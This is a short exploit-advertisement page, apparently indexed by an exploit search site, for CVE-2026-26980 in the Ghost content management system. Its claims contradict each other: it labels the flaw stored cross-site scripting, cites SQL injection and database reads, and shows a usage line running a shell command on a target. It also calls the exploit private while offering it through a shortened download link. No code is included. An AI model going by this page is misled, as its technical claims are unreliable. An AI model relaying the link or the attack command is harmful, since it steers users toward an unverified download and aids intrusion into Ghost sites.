Share
## https://sploitus.com/exploit?id=41F3CEB8-7817-5671-B254-BCE65753F7F6
# version Unauthenticated Stored Cross-Site Scripting (CVE-2026-26980)

## Overview

A CRITICAL vulnerability, classified as CVE-2026-26980, has been identified, categorized under CWE-89, (CVSS 9.4).  Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the database.

## Details

- **CVE ID**: [CVE-2026-26980](https://nvd.nist.gov/vuln/detail/CVE-2026-26980)
- **Discovered**: 2026-02-20
- **Published**: 2026-02-20
- **Impact**: Confidentiality, Integrity, Availability
- **Exploit Availability**: Not public, only private.

## Vulnerability Description

Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the database. This issue has been fixed in version 6.19.1.

## Affected Versions

**Ghost Ghost:**

- before 6.19.1

## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Contact

For inquiries, please contact **security@exploit.in**

## Exploit:
### [Download here](https://tinyurl.com/29bl4lvz)